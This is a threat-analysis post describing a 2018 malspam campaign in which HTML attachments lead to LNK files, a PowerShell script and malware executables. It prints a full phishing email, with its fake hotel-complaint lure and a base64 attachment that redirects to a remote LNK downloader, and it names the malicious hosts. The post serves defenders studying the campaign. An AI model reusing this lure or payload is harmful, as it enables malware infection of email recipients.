2018-08-21 - MALSPAM USING HTML ATTACHMENTS --> LNK FILES FOR WINDOWS INFECTIONS

ASSOCIATED FILES:

NOTES:

  • Malspam --> HTML attachment --> stat44.lnk --> wget1.ps1 --> malware EXE files from e-bookstore.eu

 

WEB TRAFFIC BLOCK LIST

Indicators are not a block list.  If you feel the need to block web traffic, I suggest the following URL and domain:

 

EMAILS

MALSPAM EXAMPLES FROM 2018-08-21:

 

MALSPAM SAMPLE:

Received: from ([85.244.107.244]) by [removed] for [removed];
        Tue, 21 Aug 2018 13:23:25 +0000 (UTC)
From: "Gerardo Elliott" <marchdor@
[recipient's email domain]>
Subject: I need to make a complaint about booking number 436533272266388.
To:
[removed]
Content-Type: multipart/mixed; boundary="1d7RDSqWTrvjr7FCc=_Sx0i4OkaQJgenMW"
MIME-Version: 1.0
Date: Tue, 21 Aug 2018 14:23:28 +0100
Priority: urgent
X-Priority: 1

This is a multi-part message in MIME format

--1d7RDSqWTrvjr7FCc=_Sx0i4OkaQJgenMW
Content-Type: text/html; charset="ISO-8859-1"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

<!DOCTYPE html>
<html>
<head>Good afternoon, my name is Gerardo Elliott
</head>
<body>
        I have a complaint to be made on the days between 4/14/2018 to 4/16/2018 stay at Arizona Inn was all paid in cash, but I left my final card 4785 Visa for additional expenses in which it was not necessary , today I received the invoice and there is a debit in the amount of 420 dollars on behalf of Arizona Inn I would like immediate refund, because my invoice and direct debit and has already been paid.
I await the return of your part in attachment sending the proof of debit with the statement of undue debit.
        </body>
</html>

--1d7RDSqWTrvjr7FCc=_Sx0i4OkaQJgenMW
Content-Type: application/octet-stream;
        name="statement.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
        filename="statement.html"

DQoNCg0KPG1ldGEgaHR0cC1lcXVpdj0icmVmcmVzaCIgY29udGVudD0iMDsgdXJsPWh0dHA6Ly8x
ODUuMjA2LjE0Ni41OC90ZXN0L3N0YXQ0NC5sbmsiPg0K

--1d7RDSqWTrvjr7FCc=_Sx0i4OkaQJgenMW--

 

TRAFFIC

TRAFFIC FROM AN INFECTED WINDOWS HOST:

 

MALWARE

MALWARE FROM AN INFECTED WINDOWS HOST:

 

WINDOWS REGSITRY UPDATE FROM THE INFECTED WINDOWS HOST:

 

IMAGES


Shown above:  Screenshot from one of the emails.

 


Shown above:  Traffic from an infection filtered in Wireshark.

 


Shown above:  Traffic from an infection shown in the Fiddler web debugger.

 


Shown above:  Spript wget1.ps1 returned from e-bookstore.eu.

 


Shown above:  Malware persistent on an infected Windows host.

 

FINAL NOTES

Once again, here are the associated files:

Zip archives are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.

Click here to return to the main page.